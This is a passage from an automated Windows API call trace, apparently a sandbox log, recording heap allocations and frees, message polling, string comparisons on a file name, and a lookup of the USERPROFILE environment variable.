HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0209.787] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa6760 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EHKlEyoM3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HKlEyoM3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KlEyoM3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lEyoM3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EyoM3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yoM3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oM3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xoIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oIg8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ig8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ms.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65a0 [0209.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65a0 | out: hHeap=0x2af0000) returned 1 [0209.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.789] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.789] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0209.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ad8 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.790] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa570 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0209.790] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0209.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0209.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0209.797] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.798] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0209.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0209.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0209.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0209.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0209.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0209.805] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0209.805] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0209.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0209.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0209.806] RtlAllocateHeap 